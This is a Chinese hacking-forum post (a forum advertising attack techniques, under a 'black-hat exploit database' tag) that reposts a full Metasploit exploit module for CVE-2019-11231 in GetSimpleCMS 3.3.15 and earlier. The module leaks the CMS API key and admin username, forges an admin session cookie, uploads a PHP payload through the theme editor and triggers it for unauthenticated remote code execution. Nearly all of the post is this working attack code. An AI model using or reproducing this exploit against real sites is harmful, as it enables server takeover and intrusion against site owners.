跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "GetSimpleCMS Unauthenticated RCE",
      'Description'    => %q{
        This module exploits a vulnerability found in GetSimpleCMS,
        which allows unauthenticated attackers to perform Remote Code Execution.
        An arbitrary file upload (PHPcode for example) vulnerability can be triggered by an authenticated user,
        however authentication can be bypassed by leaking the cms API key to target the session manager.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'truerand0m' #  Discovery, exploit and Metasploit from Khalifazo,incite_team
        ],
      'References'     =>
        [
          ['CVE', '2019-11231'],
          ['URL', 'https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution'],
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['GetSimpleCMS 3.3.15 and before', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Apr 28 2019",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to the cms', '/'])
      ])
  end

  def gscms_version
      res = send_request_cgi(
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path, 'admin', '/')
      )
      return unless res && res.code == 200

      generator = res.get_html_document.at(
        '//script[@type = "text/javascript"]/@src'
        )

      fail_with(Failure::NotFound, 'Failed to retrieve generator') unless generator
      vers = generator.value.split('?v=').last.gsub(".","")
      return unless vers
      @version = vers
  end

  def get_salt
    uri = normalize_uri(target_uri.path, 'data', 'other', 'authorization.xml')
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => uri
    )
    return unless res && res.code == 200

    fail_with(Failure::NotFound, 'Failed to retrieve salt') if res.get_xml_document.at('apikey').nil?
    @salt = res.get_xml_document.at('apikey').text
  end

  def get_user
    uri = normalize_uri(target_uri.path, 'data', 'users' ,'/')
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => uri
    )
    return unless res && res.code == 200

    fail_with(Failure::NotFound, 'Failed to retrieve username') if res.get_html_document.at('[text()*="xml"]').nil?
    @username = res.get_html_document.at('[text()*="xml"]').text.split('.xml').first
  end

  def gen_cookie(version,salt,username)
    cookie_name = "getsimple_cookie_#{version}"
    sha_salt_usr = Digest::SHA1.hexdigest("#{username}#{salt}")

    sha_salt_cookie = Digest::SHA1.hexdigest("#{cookie_name}#{salt}")
    @cookie = "GS_ADMIN_USERNAME=#{username};#{sha_salt_cookie}=#{sha_salt_usr}"
  end
  def get_nonce(cookie)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri,'admin','theme-edit.php'),
      'cookie' =>  cookie,
      'vars_get' => {
          't' => 'Innovation',
          'f' => 'Default Template',
          's' => 'Edit'
      }
    })

    fail_with(Failure::NotFound, 'Failed to retrieve nonce') if res.get_html_document.at('//input[@id = "nonce"]/@value').nil?
    @nonce = res.get_html_document.at('//input[@id = "nonce"]/@value')
  end

  def exploit
    unless check == CheckCode::Vulnerable
        fail_with(Failure::NotVulnerable, 'It appears that the target is not vulnerable')
    end
    version = gscms_version
    salt = get_salt
    username = get_user
    cookie = gen_cookie(version,salt,username)
    nonce = get_nonce(cookie)

    fname = "#{rand_text_alpha(6..16)}.php"
    php   = %Q|<?php #{payload.encoded} ?>|
    upload_file(cookie,nonce,fname,php)
    send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path,'theme',fname),
    })
  end

  def check
    version = gscms_version
    unless version
        return CheckCode::Safe
    end
    vprint_status "GetSimpleCMS version #{version}"
    unless vulnerable
        return CheckCode::Detected
    end
    CheckCode::Vulnerable
  end

  def vulnerable
    uri = normalize_uri(target_uri.path, 'data', 'other', 'authorization.xml')
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => uri
    )
    return unless res && res.code == 200

    uri = normalize_uri(target_uri.path, 'data', 'users', '/')
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => uri
    )
    return unless res && res.code == 200
    return true
  end

  def upload_file(cookie,nonce,fname,content)
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path,'admin','theme-edit.php'),
      'cookie'    => cookie,
      'vars_post' => {
        'submitsave'    => 2,
        'edited_file' => fname,
        'content' => content,
        'nonce' => nonce
      }
    })
  end
end

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。